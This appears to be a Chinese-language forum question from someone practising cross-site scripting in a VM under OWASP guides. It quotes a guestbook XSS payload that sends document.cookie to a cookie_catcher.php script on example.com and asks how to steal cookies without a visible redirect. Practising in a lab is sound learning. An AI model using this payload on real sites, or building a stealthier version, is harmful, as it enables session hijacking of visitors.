我正在按照 OWASP 指南在 VM 中练习。我知道可以通过重定向到“False”页面等来窃取 cookie,但我想在不重定向到另一个页面的情况下窃取 cookie。
所以,如果你有一些留言簿,然后你把:
document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
如何在不重定向的情况下将其放入现有页面?
基本上,我想要的是当有人点击链接时,抓取 cookie 并将其打印在当前页面的某个位置。也许在一些alt标签或什么的。
有任何想法吗?